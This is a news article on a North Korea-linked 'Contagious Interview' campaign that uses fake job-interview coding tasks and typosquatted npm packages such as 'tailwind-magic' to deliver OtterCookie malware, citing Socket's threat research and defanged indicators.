Coding tasks lead to malware delivery: These defensive measures are effective because Contagious Interview’s entry vector relies heavily on social engineering, using fake interview tasks to trick developers into installing compromised dependencies.The campaign exploits NPM, a widely used package registry for JavaScript and Node.js, by publishing packages that appear benign but carry hidden payloads. The malicious packages including one named “tailwind-magic” mimic legitimate libraries (in this case, a typosquatted version of the genuine “tailwind-merge” utility) to avoid suspicion.When an unsuspecting developer installs such a package, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in turn delivers a live payload fetched from a threat-actor controlled GitHub account named “stardev0914″. From there the payload, a variant of OtterCookie that also folds in capabilities from the campaign’s other signature payload, BeaverTail, executes and establishes a remote connection to the attackers’ control server. The malware then silently harvests credentials, crypto-wallet data, browser profiles and more.”Tracing the malicious npm package tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app,and from there to the threat actor controlled GitHub account which contained 18 repositories,” Socket’s senior threat intelligence analyst Kirill Boychenko said in a blog post, crediting related research by Kieran Miyamoto that helped confirm the malicious GitHub account stardev0914. A ‘full stack’adversary: GitHub, Vercel, and NPM: What makes this campaign stand out is the layered infrastructure behind it. Socket’s analysis traced not just the NPM packages but also how the attackers built a complete delivery pipeline: malware serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and remote command execution.Through this setup, attackers can rotate payloads, update malware unobtrusively, and tailor deployments per target”, all while blending deeply into the legitimate developer ecosystem, according to Boychenko.Once installed, OtterCookie doesn’t just run and vanish: It remains persistent, capable of logging keystrokes, hijacking the clipboard, scanning the filesystem, capturing screenshots, and grabbing browser and wallet credentials across Windows, macOS and Linux.The campaign actors’ intensified NPM activity arrives at a worrying moment for the JavaScript and open-source ecosystem. In recent months, the community has seen a flurry of NPM-based attacks, including worm-style campaigns that transformed popular packages into Trojan horses, automated credential theft, and widespread supply chain compromise across both development and CI environments.This article was first published on Infoworld.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4098699/contagious-interview-attackers-go-full-stack-to-fool-developers.html
